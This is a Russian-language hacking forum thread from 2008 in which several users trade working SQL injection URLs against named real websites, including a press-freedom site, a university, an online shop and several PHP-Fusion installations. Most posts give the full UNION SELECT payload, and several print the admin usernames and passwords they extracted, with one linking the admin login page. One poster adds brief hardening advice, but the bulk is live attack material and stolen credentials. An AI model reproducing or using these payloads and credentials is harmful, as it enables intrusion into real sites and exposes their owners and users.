20.02.2008, 04:02
|
|
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
С нами:
9752260
Репутация:
150
|
|
Таблица с юзерами: front_users
Колонки: fuser_login, fuser_passwd, fuser_email
Не смог найти базу в которой эта таблица, через схему вывести не получилось, сцуко скрипт не дает.
http://www.wan-press.org/nie/resourcescontents.php?id=-1+union+select+1,2,FUSER_PASSWD,4+FROM+3may.Front_ users/*
Но они походу все пустые
Зато есть http://www.wan-press.org/nie/resourcescontents.php?id=-1+union+select+1,2,concat(BUSER_LOGIN,0x3A,BUSER_P ASSWD),4+FROM+3may.Back_users/*
Login: 3mayAdmin
Pass: Em&y6wan!
Последний раз редактировалось Sleep; 20.02.2008 в 04:15..
|
|
|
20.02.2008, 08:45
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами:
11278406
Репутация:
818
|
|
www.symbiant.org & www.reciprocity.cc
_http://www.symbiant.org/news.php?id=-6+UNION+SELECT+1,2,3,concat_ws(0x3a,username,passw ord),5,6,7+from+users
_http://www.reciprocity.cc/news.php?newsid=-43+union+select+1,2,3,concat_ws(0x3a,username,pass word,admin),5,6+from+users
|
|
|
|
20.02.2008, 11:29
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
С нами:
9765139
Репутация:
177
|
|
румынский секс-шоп
www.sex-shop.ro
http://www.sex-shop.ro/sexolog_d.php?ID=-12340000+UNION+SELECT+1,2,3, version(),5,6,7,8/*
4.1.20 /*но не стоит расстраиваться*/
http://www.sex-shop.ro/sexolog_d.php?ID=-12340000+UNION+SELECT+1,2,3,concat_ws(0x3a, login, pass),5,6,7,8+from+ user/*
mishu:dellinspiron1300
http://www.sex-shop.ro/admin/login.php
заходим и админим 
|
|
|
|
20.02.2008, 12:28
|
|
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
С нами:
9752260
Репутация:
150
|
|
http://team-rs.ru/member.php?id=-4%2527+union+select+1,2,3,4,TABLE_NAME,6,user(),8, 9,0+FROM+INFORMATION_SCHEMA.TABLES/*
Последний раз редактировалось Sleep; 20.02.2008 в 12:30..
|
|
|
|
20.02.2008, 23:13
|
|
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
С нами:
10039659
Репутация:
209
|
|
www.dominican.edu
Код:
http://www.dominican.edu/query/ncur/display_ncur.php?id=-2161+union+select+1,2,3,4,5,6,7,user(),database(),version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68.69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119/*
user() - DUOC_ONLINE@NACIO1
database() - dominican
version() - 5.0.26-log
|
|
|
|
21.02.2008, 00:00
|
|
Познающий
Регистрация: 25.07.2007
Сообщений: 48
С нами:
9892612
Репутация:
19
|
|
http://borowiha.inetrus.ru/top/inf.php?sid='+union+select+id,pass,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+u sers+where+id=2/*
---
вот еще, но тут дальше расковырять не получилось.если у кого получится пишите в приват:
http://wap-top.ru/top/index.php?p=-1
|
|
|
|
21.02.2008, 00:06
|
|
Познающий
Регистрация: 25.07.2007
Сообщений: 48
С нами:
9892612
Репутация:
19
|
|
и еще
http://kyky.biz/bibl/index.php?i=1&ver=xml&letter='+union+select+1,2,3, 4,5/*
|
|
|
|
21.02.2008, 01:43
|
|
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
С нами:
9752260
Репутация:
150
|
|
http://www.cz-usa.com/product_detail.php?id=159999999+union+select+1,2,V ERSION(),USER(),DATABASE(),6/*
VERSION:4.0.21
|
|
|
|
21.02.2008, 07:37
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами:
11278406
Репутация:
818
|
|
Официальный сайт веб-движка becontent. Очень мне понравилась его административная часть. На сайте есть ссылка на скачку, если изменить алгоритм хеширования с стандартного md5 на md5(md5($pass)) или добавить salt, вполне хороший движок.
А вот и сама уязвимость (банально) :
_http://www.becontent.org/news.php?id=-3+union+select+1,concat_ws(0x3a,username,password) ,3,4+from+users
alfonso : pippo12
Доступ в административную часть я заблокировал, привелегии администратора снял, дабы небыло повторных дефейсов, как ето любят делать "неп0хеки".
СКРИН:
P.S. Профильтровать переменные, изменить алгоритм хеша, не ставить легкие пароли и работать с БД без file_priv отличный движок.
P.S.S Ссылка на скрине Не реклама!!!
Последний раз редактировалось b3; 21.02.2008 в 07:39..
|
|
|
|
21.02.2008, 16:47
|
|
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
С нами:
10333826
Репутация:
369
|
|
Код HTML:
http://www.kensybrowns.com/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=2
Код HTML:
http://www.arok.dk/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
Код HTML:
http://www.pinocchioclub.com/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
Код HTML:
http://www.irmilano.it/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
Код HTML:
http://www.maddenitalianleague.eu/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=2
[HTML]
Код HTML:
http://www.radiyocristal.com/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
меняем значение в переменной ID и смотрим хеш пасса любого юзверя
ЗЫ все для ачата |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
